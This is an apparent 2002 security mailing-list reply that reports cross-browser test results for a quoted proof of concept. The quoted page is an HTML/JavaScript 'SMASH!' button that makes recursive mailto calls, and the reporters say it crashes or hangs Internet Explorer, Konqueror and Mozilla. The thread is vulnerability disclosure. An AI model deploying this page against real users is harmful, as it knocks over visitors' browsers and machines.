After a few minutes of testing it seems this does not only affect Internet
Explorer but also the following browsers:

In KDE's Konqueror (latest version) it seg faults the browser instantly.

In Mozilla 0.99 it causes a Denial of Service situation against the
machine with 100% CPU usage, and some crazy hard drive accessing until
the process is killed.

Other information:

Netscape 6 series (latest version) does nothing when SMASH! is clicked.

Galeon (latest) tries to mail a rather long email address, but the browser
itself is unaffected.

Test System:
Linux Redhat 7.3
2.4.18-4 #1 Thu May 2 18:06:25 EDT 2002 i686

---------------------------------
Scott Mackenzie
Cybernetics & Virtual Worlds (2)
Bradford University
http://smackenz.zapto.org
---------------------------------

On Sun, 2002-06-02 at 22:08, Matias Sedalo wrote:
> the 28/07/1999 I have discovered a stack buffer overflow caused by until
> the moment all the versions of the Internet Explorer.
> In many windows98 causes the necessity to reinitiate the equipment, since
> to my to seem it remains without memory.
> Only it has been proven in several versions 5 of IE on WindowsNT
> server sp6 and windows98 Second Edition. As I said before the Windows 98
> I had to reinitiate it to the force.
> Can be possible to execute arbitrary code using the variable company of
> the example?
>
> // internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6
> // internet Explorer 5.00.3500.1003 on Windows98se
>
> -----------cut here---------------------------
> <html><head></head>
> <script language="JAVASCRIPT">
> function hacerMail() {
>     var company;
>
>     crear();
>     address="s0t4ipv6at_private";
>     soporte();
> }
> function soporte(){
>     var soporte="billat_private";
>     window.location="mailto:"+address+"?cc="+soporte+"&subject="+company;
>     // window.location=company; // also this line cause the bof.
>     close(hacerMail());
> }
> function crear(){
>     company="shellcode here?\n"; // i don't think so.
> }
> </script>
> <input type="button" onClick="hacerMail();" value="SMASH!"></input>
> </html>
> -----------cut here---------------------------
>
> Regards.
>
> - Internet is harmful to your health -
> - Law No. 127.0.0.1
>
> Matias Sedalo
> http://www.shellcode.com.ar
>
> s0t4ipv6at_private
> B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2
> .......................................